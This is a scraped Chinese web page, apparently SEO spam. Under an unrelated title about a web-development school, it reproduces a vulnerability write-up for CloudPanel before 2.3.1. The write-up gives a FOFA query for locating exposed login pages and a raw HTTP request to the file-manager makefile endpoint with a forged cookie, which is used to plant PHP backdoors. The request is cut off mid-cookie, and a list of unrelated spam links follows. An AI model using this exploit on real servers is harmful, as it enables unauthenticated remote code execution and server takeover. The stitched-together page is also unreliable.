当前位置: 首页 > news >正文

合肥网站开发培训学校检测网站是否安全

合肥网站开发培训学校,检测网站是否安全,鹰潭做网站公司,做单页网站需要做什么0x01 产品简介 CloudPanel 是一个基于 Web 的控制面板或管理界面,旨在简化云托管环境的管理。它提供了一个集中式平台,用于管理云基础架构的各个方面,包括虚拟机 (VM)、存储、网络和应用程序。 0x02 漏洞概述 由于2.3.1 之前的 CloudPanel 具有不安全的文件管理器 cook…

0x01 产品简介

CloudPanel 是一个基于 Web 的控制面板或管理界面,旨在简化云托管环境的管理。它提供了一个集中式平台,用于管理云基础架构的各个方面,包括虚拟机 (VM)、存储、网络和应用程序。

0x02 漏洞概述

由于2.3.1 之前的 CloudPanel 具有不安全的文件管理器 cookie 身份验证。未经身份验证的攻击者可以利用此问题在服务器上创建任意文件,创建PHP后门文件可远程代码执行,并且获取服务器权限。

0x03 影响范围

CloudPanel >= v2.0.0 && <= v2.3.0

0x04 复现环境

FOFA:title=="CloudPanel | Log In"

0x05 漏洞复现

创建文件

POST /file-manager/backend/makefile HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.1; Trident/3.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0
http://www.zhongyajixie.com/news/60492.html

相关文章:

  • 360建网站今日国内新闻热点
  • 合肥网站制作需万网阿里云域名查询
  • 做网站 如何注册公司新网
  • 如何分析网站开发语言第三方营销策划公司有哪些
  • wordpress 多站点管理怎么下载有风险的软件
  • 手机wap购物网站模板seo点击排名源码
  • 北京市网站开发公司深圳关键词优化软件
  • 北京网页制作设计单位成都关键词优化排名
  • 电子商务网站建设的成本分析2023b站推广大全
  • 石家庄正规制作网站公司搜客通
  • 衡水做网站哪家好西安百度竞价推广
  • 做网站时如何给文字做超链接上线了建站
  • 域名是网址吗seo是什么部门
  • dw如何用表格做网站网络销售的方法和技巧
  • 电商网站建设怎么样智能营销系统
  • 做网站的流程知乎seo运营是做什么的
  • 个人网站可以做企业宣传免费网络推广网址
  • 山西网站制作公司哪家好网页搜索引擎
  • 任县网站建设设计seo指搜索引擎
  • 需要做网站建设和推广路由器优化大师
  • 列举免费域名注册的网站nba最新交易汇总
  • 天津市建设局网站太原竞价托管公司推荐
  • wp如何做网站地图广东东莞今日最新消息
  • 怎么做国外网站网站功能
  • 做网站色弱可以吗免费网站分析seo报告是坑吗
  • 想学做网站 应该学赣州seo推广
  • wordpress钉钉登陆seo系统源码
  • 湛江市建网站有没有帮忙推广的平台
  • 河南商务学校网站建设seo提高关键词
  • wordpress 自动生成标签网站排名优化教程